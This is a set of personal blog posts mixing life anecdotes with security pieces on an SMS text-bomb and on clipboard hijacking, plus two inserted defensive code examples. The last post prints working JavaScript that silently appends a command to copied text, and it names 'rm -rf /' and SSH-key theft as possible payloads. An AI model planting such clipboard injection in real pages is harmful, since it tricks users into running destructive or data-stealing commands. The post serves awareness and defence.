End of Session 2014
Author: jgamblin
Last night I sent an email to a good friend and his boss passing on an amazing career opportunity that paid an ungodly amount of money.
It was basically Scrooge McDuck, build-a-money-bin money.
So why didn’t I take it? After a lot of thinking and discussion with my wife it boiled down to timing and location.
We weren’t crazy about the location. We would have had to relocate to Atlanta. We don’t have more than a handful of friends in Atlanta and our nearest relatives would be about 300 miles away. I don’t like grits.
The timing wasn’t great either. My son is getting ready to start kindergarten next month. My wife has a job that she loves. Our family is a half-hour drive away. We have amazing friends. We love our church. I don’t like grits.
Even after that list of cons, it was still amazingly hard to say no to a great career opportunity and the possibility of my own money bin.
So why did I?
I remember seeing this quote a few months ago:
“Half of the troubles of this life can be traced to saying yes too quickly and not saying no enough.” – Josh Billings
So I took my time and thought about it. On Monday I was ready to call a Realtor and put my house on the market. On Tuesday I was trying to figure out if I was going to sound cool with a southern accent. On Wednesday I woke up and realized it wasn’t the right time to move our family halfway across the country.
So yesterday I wrote an email apologizing and declining the position, put in a 16-hour day at my current job, and went home and slept like a baby.
It will be hard not owning a Tesla and having a bin full of money to swim around in, but I know I made the right choice for my family, and hopefully there will be other opportunities like this in the future.

This afternoon a “hacker” decided to text-bomb my phone with about 1000 text messages asking me to PayPal him $100 to stop.
A couple of things:
- I don’t negotiate with terrorists. (I always wanted to say that.)
- Part of the text bomb gave me information on how it was happening.
After getting a couple of messages I noticed they were all coming from onlinetextmessage.com. After looking at their web page I noticed that you could block messages from their site to your phone.
Once I blocked the attack I was interested in how they did it and started to do a little bit of research.
I am about to give you a link to a script that can do bad things. Please don’t do bad things.
With a few well-placed Google searches (onlinetextmessage.com sms bomb) I found this pastebin with a two-year-old Perl script in it. I am “researching” here, so I had to test out the script myself (against my own phone) and, surprisingly, it works really well.
After looking at a couple of other online SMS-sending websites, it appears the reason that onlinetextmessage.com is vulnerable to this abuse is because they don’t ask for a captcha before sending the message. This would seem to be a pretty easy addition to their code to stop this from happening. I have sent them a nice email asking them to make these changes. I doubt I’ll ever hear from them.
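To make the missing control concrete, here is an added example (not code from the original post, and not onlinetextmessage.com’s or any other site’s code) of a tiny Node.js "send a text" handler in its weak form next to a hardened one. The hardened version does two things: it refuses a request without a verified captcha token, and it caps how many messages one destination number can receive in an hour no matter who submits the form. The names handleSendWeak, handleSendHardened, RecipientLimiter and captchaOk are assumptions, and the phone number, message text and burst size are constructed samples.

```javascript
// Added example, not code from the original post or from any SMS site: a
// minimal server-side guard for a "send a text message" web form, with the
// weak handler (what the post describes) next to a hardened one.
// handleSendWeak, handleSendHardened, RecipientLimiter and captchaOk are
// assumed names; the phone number and message text are constructed samples.

const WINDOW_MS = 60 * 60 * 1000; // one hour
const MAX_PER_WINDOW = 3;         // messages allowed to one number per window

// Digits only, so "555-0100" and "(555) 0100" land in the same bucket.
function normalizeNumber(raw) {
  return String(raw).replace(/\D/g, '');
}

// Sliding-window count of sends per recipient, keyed by the destination
// number rather than the sender, since the abuse is one script (or many
// senders) hammering a single victim.
class RecipientLimiter {
  constructor(windowMs = WINDOW_MS, max = MAX_PER_WINDOW) {
    this.windowMs = windowMs;
    this.max = max;
    this.sent = new Map(); // normalised number -> timestamps (ms) of recent sends
  }

  // Records the send and returns true if the recipient is still under the
  // limit; returns false (and records nothing) once the window is full.
  allow(recipient, now = Date.now()) {
    const key = normalizeNumber(recipient);
    const recent = (this.sent.get(key) || []).filter(t => now - t < this.windowMs);
    if (recent.length >= this.max) {
      this.sent.set(key, recent);
      return false;
    }
    recent.push(now);
    this.sent.set(key, recent);
    return true;
  }
}

// Weak: anything with a number and a message goes straight to the carrier.
// A loop around this endpoint is all the text bomb in the post needed.
function handleSendWeak(request, deliver) {
  deliver(request.to, request.message);
  return { status: 200, sent: true };
}

// Hardened: a captcha token must verify and the recipient's window must not
// be exhausted before the message is handed to the carrier. captchaOk stands
// in for a server-side check against the captcha provider (assumed here).
function handleSendHardened(request, deliver, limiter, captchaOk) {
  if (!captchaOk(request.captchaToken)) {
    return { status: 400, sent: false, reason: 'captcha failed' };
  }
  if (!limiter.allow(request.to)) {
    return { status: 429, sent: false, reason: 'too many messages to this number' };
  }
  deliver(request.to, request.message);
  return { status: 200, sent: true };
}

// Replay a constructed burst of `count` identical requests (the post's bomb
// was about 1000 messages) and count how many reach the carrier.
function simulateBurst(count, hardened, captchaToken) {
  let delivered = 0;
  const deliver = () => { delivered += 1; };
  const limiter = new RecipientLimiter();
  const captchaOk = token => token === 'valid-token'; // constructed stand-in
  for (let i = 0; i < count; i++) {
    const req = { to: '555-0100', message: 'pay $100 to stop', captchaToken };
    if (hardened) handleSendHardened(req, deliver, limiter, captchaOk);
    else handleSendWeak(req, deliver);
  }
  return delivered;
}

console.log('weak handler delivered:', simulateBurst(1000, false, ''));
console.log('hardened, scripted (no captcha):', simulateBurst(1000, true, ''));
console.log('hardened, captcha solved every time:', simulateBurst(1000, true, 'valid-token'));
```

The per-recipient cap is the part the captcha alone does not give you: even if someone sits and solves a captcha for every request, the third message in an hour to the same number is the last one the carrier sees. Keying the limit on the destination rather than the sender’s IP or account is deliberate, because the victim’s number is the one thing every request in a text bomb has in common.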
Meet the Capello Sleep & Charge Dual Alarm Clock with Night Light sold exclusively by Target.

It works fairly adequately as a:
- USB Charging Station
- Alarm Clock
- Radio
- Night Light(?)
Why I hate it is this button right here:

This “DST” button is .25" away from the snooze button and .2" away from the source and sleep timer buttons.
Why is this a big deal? Because when you accidentally touch the button it magically makes it an hour earlier in my bedroom than in the rest of the world. For a feature that will save me 30 seconds two times a year, they have basically put a self-destruct button right on top of their product.
How in the world do products like this make it to the market?
I was having a conversation about security today with a good friend and the subject came up of what is the most difficult question in security to answer?
After a few minutes of back and forth we settled on the following question:
Who would want to hack us?
This question is nearly always asked with the person asking it implying they aren’t important enough to be hacked.
As security professionals we mostly do a terrible job at answering this question. Normally we end up answering with something vague like “hackers”.
(This is what a hacker looks like.)
When we answer back with a vague answer like “hackers” we don’t make the threat real to the person asking the question. They will care and think about hackers as much as they do the nebulous bad guy who might break into their car and steal their 3 Doors Down CD.
The best way I have found to answer this question is by asking a question back.
Here are a few questions I always try to ask back when someone asks me, “Who would want to hack us?”
Have you ever had an employee leave on bad terms?
Have you ever made a competitor mad?
Is there anyone that would enjoy you having negative publicity?
Everyone can think of an answer to one of these questions and it plants a mental image of someone who would actually want to do their company harm and not a guy with a ski mask.
How do you answer the question: Who would want to hack us?

I am going to whack the ball over the fence.
That was my four-year-old’s response when I reminded him, as I woke him up, that his first T-Ball game was later that day. I love my son, but he spent 80% of his first and only T-Ball practice trying to make the other kids on his team laugh. He is no Jose Abreu.
My first instinct was to tell him:
Logically the chances of you hitting the ball over the fence are not very realistic, why don’t we concentrate on a single and hustling to first base?
As I sit on his bed getting ready to tell him why he isn’t going to hit a home run he tells me:
I can’t wait for my game tonight, it is going to be so much fun!
At that moment my 4-year-old reminded me that baseball isn’t as much fun if you aren’t swinging for the fences. The same can be said about life. I can hit singles and hustle to first all day, but wouldn’t it be a lot more fun to swing for the fences?
Even if you don’t hit a home run you might still end up on 3rd base talking to your friend.

This morning I was out running some errands and NPR had an interview with David Sklansky, a poker player who wrote a book called “The Theory Of Poker”, and he said the most important thing to remember about poker is that:
Poker Is Fundamentally A Battle Of Mistakes
That quote stuck with me all day and when I got some time to sit down and Google it tonight I found this amazing excerpt from his book:
Every time you play a hand differently from the way you would have played it if you could see all your opponents’ cards, they gain; and every time you play your hand the same way you would have played it if you could see all their cards, they lose.
Let’s make this about security:
Every time you secure your network differently from the way you would have if you could see all your opponents’ attacks, they gain; and every time you secure your network the same way you would have if you could see all their attacks, they lose.
Poker players spend just as much time at the table thinking about who they are playing as about what they are playing. Security professionals, on the other hand, spend a lot of time and a lot of money trying to prevent attacks that the people attacking their networks won’t or can’t use. I know small companies who are more worried about APTs than they are about phishing attacks because they watched a 60 Minutes story about it.
Can you answer these five questions about the people who would likely attack your network:
Who would want to attack my network?
Why are they attacking my network?
What do they want to steal or change?
Is it possible for them to access the information they want to steal?
If I were them how would I try to steal the information?
I think if you can answer those five questions you will be off to a good start on understanding the correct way to secure your network, because:
Security Is Fundamentally A Battle Of Mistakes.
I have a mentor who sends me a motivational quote a couple of times a week and today he dropped this on me:
If you’re the smartest person in the room, then you need to find another room.
I have heard that quote before and actually used it in an opening slide of a talk to make a self-deprecating joke. I get the underlying meaning of the quote, but I think few people would actually admit to thinking that they are the smartest person in the room.
So either the person who wrote this quote was an egomaniac or wasn’t clear in his writing. Here is what I think he is talking about:

I have an amazing four year old at home who challenges me all the time by asking me questions I don’t know the answer to (Why are bananas yellow?) and asking me questions that make me think about life (Why do we have a house and my friend lives in an apartment?).
To be honest, a lot of the time I turn into this guy:

One thing my son does every day is challenge me to think and learn. So after thinking about that quote for a little bit I responded with this:
If you’re in a room with people who don’t challenge you, then you need to find another room.
Are you being challenged in your personal and professional life or is it time to find another room?
Earlier today I was reading this article on Rollingstone.com about how FXX plans to show all 552 episodes of The Simpsons this August, and noticed that when I copied anything from the website it appends a link and copyright notice. That got me thinking about what else could be appended to copied text and how bad guys could use it.
So after a little looking around I found this JavaScript that will append text to anything copied. To test my theory out I set up a secondary tumblr account called badcopypaste.tumblr.com and added this JavaScript to the head of the document:
<script type="text/javascript">
// Runs on every copy event: swaps the user's selection for a hidden div whose
// text is the selection plus `pagelink`, so the clipboard receives both.
function addLink() {
  var body_element = document.getElementsByTagName('body')[0];
  var selection;
  selection = window.getSelection();
  var pagelink = "<br></br> du <br></br>"; // change this if you want
  var copytext = selection + pagelink;
  var newdiv = document.createElement('div');
  // Park the div far off-screen so the swapped selection is never visible.
  newdiv.style.position = 'absolute';
  newdiv.style.left = '-99999px';
  body_element.appendChild(newdiv);
  newdiv.innerHTML = copytext;
  // Move the selection onto the hidden div; the browser copies that instead.
  selection.selectAllChildren(newdiv);
  // Remove the div as soon as the copy has completed.
  window.setTimeout(function() {
    body_element.removeChild(newdiv);
  }, 0);
}
document.oncopy = addLink;
</script>
and posted this post:

When you copy and paste the echo $PATH command in Firefox and Chrome you get this:
echo $PATH
du
If you copy and paste directly into a terminal window you get this:
In the JavaScript I added a non-malicious du command as an example. You can’t see it until you have already pasted it, and it could just as easily have been rm -rf / or a command to SCP all your SSH keys to “The Bad Guys™”.
That is why it is always a good idea to paste all commands into a notepad and not directly into a terminal, and a dumb idea to let JavaScript add information to your clipboard.
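Pasting into a notepad first works because it lets you see every line before any of it reaches a shell. Here is an added example (not code from the original post) that does that check in Node.js: it splits clipboard text into the command lines a terminal would see, flags a line break anywhere in the paste (the terminal runs everything before it the moment the paste lands), and reports any line the user never selected. The names inspectPaste, safeToPaste and describe are assumptions; CAPTURED_CLIPBOARD is a constructed sample that matches the post’s demo, a copied "echo $PATH" that arrives with " du " appended on its own line.

```javascript
// Added example, not code from the original post: a paste inspector that shows
// what a terminal would actually run if a piece of clipboard text were pasted
// into it. inspectPaste, safeToPaste and describe are assumed names;
// CAPTURED_CLIPBOARD is a constructed sample matching the post's demo (a copied
// "echo $PATH" that arrives with " du " appended on its own line).

// What the user believes they copied, and what the page put on the clipboard.
const SELECTED_TEXT = 'echo $PATH';
const CAPTURED_CLIPBOARD = 'echo $PATH\n du \n';

// Break clipboard text into the command lines a shell would see and compare
// them with the text the user actually selected.
function inspectPaste(clipboardText, selectedText) {
  const text = clipboardText.replace(/\r\n/g, '\n');
  // Any line break in the paste means the shell runs everything before it the
  // moment the paste lands, before the user has a chance to press Enter.
  const executesImmediately = text.includes('\n');
  const commands = text.split('\n').map(l => l.trim()).filter(l => l.length > 0);
  const expected = new Set(
    (selectedText || '').split('\n').map(l => l.trim()).filter(l => l.length > 0)
  );
  // Lines the user never selected are the injected payload.
  const unexpected = commands.filter(l => !expected.has(l));
  return { commands, executesImmediately, unexpected };
}

// A paste is only safe to send to a terminal when it will wait for Enter and
// contains nothing beyond what was selected.
function safeToPaste(report) {
  return !report.executesImmediately && report.unexpected.length === 0;
}

// Human-readable summary, in the spirit of the post's "paste into a notepad
// first" advice: show every line before any of it reaches a shell.
function describe(report) {
  const lines = report.commands.map((c, i) => `  ${i + 1}: ${c}`);
  const verdict = safeToPaste(report)
    ? 'safe: waits for Enter, nothing injected'
    : 'NOT safe: ' +
      (report.executesImmediately ? 'runs immediately; ' : '') +
      'injected: ' + JSON.stringify(report.unexpected);
  return [...lines, verdict].join('\n');
}

console.log(describe(inspectPaste(CAPTURED_CLIPBOARD, SELECTED_TEXT)));
console.log(describe(inspectPaste('echo $PATH', SELECTED_TEXT)));
```

Note that a paste with nothing injected but a trailing newline is still reported as not safe: the shell runs it on arrival, which is exactly the property the hidden <br> tags in the script above are exploiting.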
The Missouri Capitol in Spring